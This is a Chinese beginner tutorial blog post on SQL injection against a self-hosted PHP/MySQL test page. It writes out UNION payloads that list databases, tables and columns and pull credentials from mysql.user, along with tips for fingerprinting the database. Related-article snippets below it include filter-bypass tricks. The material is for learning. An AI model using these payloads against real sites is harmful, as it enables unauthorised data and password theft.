学sql注入要先学mysql_简单的SQL注入学习

最新推荐文章于 2023-06-08 13:07:37 发布
最新推荐文章于 2023-06-08 13:07:37 发布
阅读量963 收藏 1
点赞数 1
文章标签: 学sql注入要先学mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42537142/article/details/114016456
版权

引贴:

http://blog.163.com/lucia_gagaga/blog/static/26476801920168184648754/

首先需要编写一个php页面,讲php页面放入/opt/lampp/htdocs目录下:

9786aec50e5521095283aaed98366443.png

解释一下这个页面:

1.通过if语句判断变量是否初始化

2.if语句中通过mysql_connect()函数连接数据库

3.连接数据库成功后,选择一个数据库

4.选择完数据库后执行一条mysql查询

5.进行查询结果的处理

6.使用echo讲查询结果输出,便于查看

接下来配置数据库mululu_testdb,创建users表,并且造数据

323934b6605cd3e5ac577a710a03e09c.png

然后使用 sql 语句取到指定的记录 参数从浏览器传入

取到的记录显示在指定的位置 效果就酱紫:

9844a1291f61b1ee6b0cfa637b87f132.png

先来看看 and 注入和 or 注入:

3f1d3b4b7a44897165297c278b7fe387.png

ed40fa3649a96790f9df2920df11341a.png

再来看看加法注入和减法注入:

84235f29801f16632c2842f6d57027fc.png

db0a7ca203c371177e883d007f0721c9.png

以上就是最简单的 SQL 注入示例;

通过传入人为构造的参数 取得本来拿不到的数据;

如果要攻击数据库 最起码要知道被攻击的是什么数据库

首先从 Web 应用技术上就可以获得一些线索:

如果是使用 ASP 或者 .NET 开发的系统 数据库就可能是 SQLServer

如果是使用 PHP 开发的系统 数据库就可能是 MySQL 或者 PostgreSQL

而如果是使用 Java 开发的系统 它挂的数据库就可能是 Oracle 或者 MySQL

除了 Web 应用之外 底层操作系统也可以提供线索:

比如安装 IIS 作为服务器平台 则后台数据库就可能是 SQL Server

而允许 Apache 和 PHP 的 Linux 服务器 就可能使用 MySQL 或者 PostgreSQL

另外还可以借助错误信息来判断数据库类型

因为报错中有可能直接显示数据库的类型:

b3935046afbf94c89f068b266837e952.png

cbedd06a9505b22787470bf8412564d3.png

为了获知某个表里面存在多少个字段 可以注入 order by 子句:

d87cc5250e859fc622982764ca9da502.png

还可以通过 union 语句注入的方式 获得数据库的用户名和版本:

6fc3846a4216eb99d0475b0253697653.png

然后就可以通过注入语句 获得所有的数据库的名字:

select * from users where id = 1 union select null,schema_name,null from information_schema.schemata

501a3625bd904c7973cc483b69c68577.png

上图所示 服务器上所有的数据库就这样暴露出来 。。。

有了数据库的名字 还可以进一步获取表的名字:

select * from users where id = 1 union select null,table_name,null from information_schema.tables where table_schema=‘bugfree‘

a8e4dcc394d970c72857f3e4c35b4684.png

有了表名字 获取字段名字也很容易:

select * from users where id = 1 union select null,column_name,null from information_schema.columns where table_name=‘bf_bug_info‘ and table_schema = ‘bugfree‘

1a01167edb03f1cd16e0b5b2881170e7.png

至此 我们已经利用 SQL 注入的方式 获得了太多信息

然鹅 我们甚至还可以获得更多

在掌握数据库连接密码的情况下 我们来查询一下 mysql.user 表:

38e55a9aa6a2c504f8b3cc71aff64473.png

那么如果没有密码呢 通过注入的方式 也可以获得这些数据:

select * from users where id = 1 union select Host,user,password from mysql.user

0b5ed18f5a0e2fec9205f62b41fcdd1c.png

以上展示的就是最为基础的 SQL 注入的实现形式了

假设 SQL 语句是 INSERT into 表名 values (‘X‘,X,X);

那么就往数据库插入了非法数据了。。。。。

简单的SQL注入学习

标签:数据   操作系统   参数   ges   个数   postgre   static   配置   pos

本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉

本文系统来源:http://www.cnblogs.com/mululu/p/6373472.html

小红帽的灰灰狼
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql还是sql好_都说自SQL数据库难,是真的吗?
weixin_39901518的博客
01-20 8451
应该说任何编程语言自都难首先,自属于粗放式学习你没有目标性,对于所的知识仅限于记住了,不知道未来这个知识点有什么用途。就像我最近在Python ,一些比较基的知识点了忘忘了继续,连续几遍还是容易忘。因为我没有去实战训练。其次,自很难系统性的面面俱到我们学习老师总是给我们讲解各类知识点的作用,而能够系统性梳理这些知识点很难,你得完全理解各个知识点之间的内在联系。就比如SQL ,分为基础...
MySQLSQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
sql注入先学mysql_零基础如何SQL注入
weixin_29210727的博客
02-12 407
首先就是要精通各种注入的原理,然后就是多练习了。多说无益,直接奉上sql注入笔记供大家学习MYSQL注入函数version()——MySQL 版本user()——数据库用户名database()——数据库名@@datadir——数据库路径@@version_compile_os——操作系统版本information_schema 自带数据库information_schema.schemata ...
SQL注入速查表
ww564的博客
11-09 366
过滤and or 十六进制绕过 or ——> o\x72 大小写绕过 Or aNd 双写绕过 oorr anandd urlencode,ascii(char),hex,unicode编码绕过 一些unicode编码举例: 单引号:' %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 关键字内联注释尝试绕所有 /*!or*/ /*!and*/ 左括号过滤 urlencode,ascii(char),hex,unicod
sql注入先学mysql_MySQL 从零基础入门到精通(涵盖 SQL 注入及如何防止)
weixin_39943868的博客
02-12 168
SQL和安全测试是每个软件工程师都需要具备的额外的、通用的技能,这与他们在项目中的角色无关。这门课程既详细的讲解了SQL相关的各种话题,又讲解了怎么对数据库进行测试,怎么安全的在代码中用SQL,详细的讲解了SQL注入如何发生,以及如何防御。通过教授这些,也让你比你工作中的其他工程师更有优势。当然,这也是每个软件工程师面试中都要考验的技能之一。这门课对初者来说有什么特别之处?先解释概念后实例演示。...
sql注入先学mysql_学习使用PDO查询Mysql来避免SQL注入风险
weixin_42116805的博客
02-12 96
虽然可以用mysql_real_escape_string()函数过滤用户提交的值,但是也有缺陷。而使用PHP的PDO扩展的 prepare 方法,就可以避免sql injection 风险。PDO(PHP Data Object) 是PHP5新加入的一个重大功能,因为在PHP 5以前的php4/php3都是一堆的数据库扩展来跟各个数据库的连接和处理,如 php_mysql.dll。 PHP6中也...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
python 零基础学习MySQL数据库3 sql注入和防止sql注入 .mp4
04-21
python 零基础学习
PHP+MysqlSQL注入源码 下载
01-01
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
mysql前要先学sql语言吗_学习MySQL需要注意的几个SQL语句
weixin_33921444的博客
02-05 1970
学习MySQL需要注意的几个SQL语句文章作者:网友投稿 发布时间:2008-08-08 16:11:35 来源:网络学习使用mysql需要注意的几个sql语句,希望对初者有所帮助:1.从一个表向另一个同样结构的表插入批量的数据insertintotable1(select*fromtable2)2.使用sql语句插入大量语句可以如下方式进行插入,一次提交即可。insertintotable1v...
mysql还用sql吗_mysql学习-sql根本使用_mysql
weixin_32424555的博客
02-05 462
mysql学习--sql基本使用上图为数据库操作分类:以下的操作参考(mysql必知必会)创建数据库 执行脚本建表:mysql> create database mytest; Query OK, 1 row affected (0.07 sec) mysql> show databases; +--------------------+ | Database |...
详细|通过mysql学习sql注入
st3pby的博客
06-08 903
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
先写sql还是mysql_Mysql中,21个写SQL的好习惯,你值得拥有呀
weixin_42360972的博客
02-05 174
1. 写完SQL先explain查看执行计划(SQL性能优化)日常开发写SQL的时候,尽量养成这个好习惯呀:写完SQL后,用explain分析一下,尤其注意走不走索引。explain select * from user where userid =10086 or age =18;复制代码2、操作delete或者update语句,加个limit(SQL后悔药)在执行删除或者更新语句,尽量加上li...
从头开始MySQL
Steven的博客
07-21 323
基础篇 1.SQL和存储引擎 2.DCL 3.DDL 4.DML 5.DQL 6.表连接 7.常用函数 8.查询缓存 9.慢查询日志 10.查询分析器 11.索引的基本使用 12.事务控制 13.预处理 14.视图 15.存储过程 16.触发器 17.字符集 18.SQL注入 19.导出数据 20.导入数据 21.复制表 22.定时备份数据库 高级篇 持续更新中,敬请期待… ...
html_css_javascript_php_ mysql_HTML、CSS、JavaScript、PHP、MySQL学习顺序是什么?
weixin_39772420的博客
01-27 187
主要看你要往哪发展,有前端和后端。但是无论前端后端都要html和JavaScript作为基础,所以建议先学HTML和JavaScript。在学习HTML的过程中,可以尝试一下简单的CSS和JavaScript,它们都是脚本语言,调试也很简单,直接用浏览器就可以了。(顺便说一下,现在的情况对比IE的那个时代,不知道要好多少倍了。经历过浏览器兼容性测试的人回复个222)简单的测试方法也说一下,下载一个...
量化投资sql还是mysql_新人如何学习量化投资
weixin_30913041的博客
02-12 428
原标题:新人如何学习量化投资目前,随着国内量化投资产业的发展,股票量化投资以其资金容量大,客户群体庞大,市场有效性弱,政策市等特点,一直是量化投资领域的重点与难点。 股票量化分为量化选股和交易择时, 前者解决买什么股票,后者解决何时进出的问题, 本课程介绍利用python丰富的量化分析库,在浩瀚的金融数据中利用量化分析的方法寻找ALPHA。期货的话,中国就只有 50个左右的品种,而且有自动化交易接...
重新学习MySQL数据库11:以Java的视角来聊聊SQL注入
Java技术江湖
01-17 1905
以Java的视角来聊聊SQL注入 转自 javatikuJava面试那些事儿2017-08-09 在大二就接触过sql注入,之前一直在学习windows逆向技术,认为web安全以后不是自己的从业方向,所以当时也就没有深入研究。工作多年来,本人也一直从事安全开发相关工作,随着Java的市场份额越来越重,在工作中接触Java的机会也越来越多,也是机缘巧合的契机,自己开始走向了偏 Java开...
2020年了,还要学习SQL注入吗?
ve9etable的博客
07-08 1481
本文是学习SQL注入的笔记和部分总结,详细的写了我认为重要的一些东西 目录 SQL注入漏洞基础 我们为什么要了解SQL注入漏洞 SQL注入原理 注入过程 注入方法 数字型注入 字符型注入 MySQL数据库的使用 MySQL的常用语句 元数据库 常用函数 注入手法 联合查询 案例:利用联合查询获取用户名和密码 报错注入 布尔盲注 延时注入 SQL注入漏洞基础 我们为什么要了解SQL注入漏洞 SQL注入漏洞(SQL Injection)是很高危的漏洞之一,通过OWASP
SQL注入学习前置知识
L15732776064的博客
11-26 417
WEB学习杂谈 SQL注入(1) 一、sql注入的原理 SQL注入是由于web应用程序对用户输入数据的合法性判断不严格导致攻击者可以利用用户输入数据的媒介执行SQL语句 例如 select * from table where username = 'input' and passwd='input'; 如果再次此处用户输入数据的过滤不严格,在用户输入用户名admin’ #时便可以在不输入密码的情况下进行admin账户的登录 二、sql注入的类型 在本篇博客中对各种类型的SQL注入进行一个大概的总结,具
墨者sql注入mysql
最新发布
09-29
墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。 第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值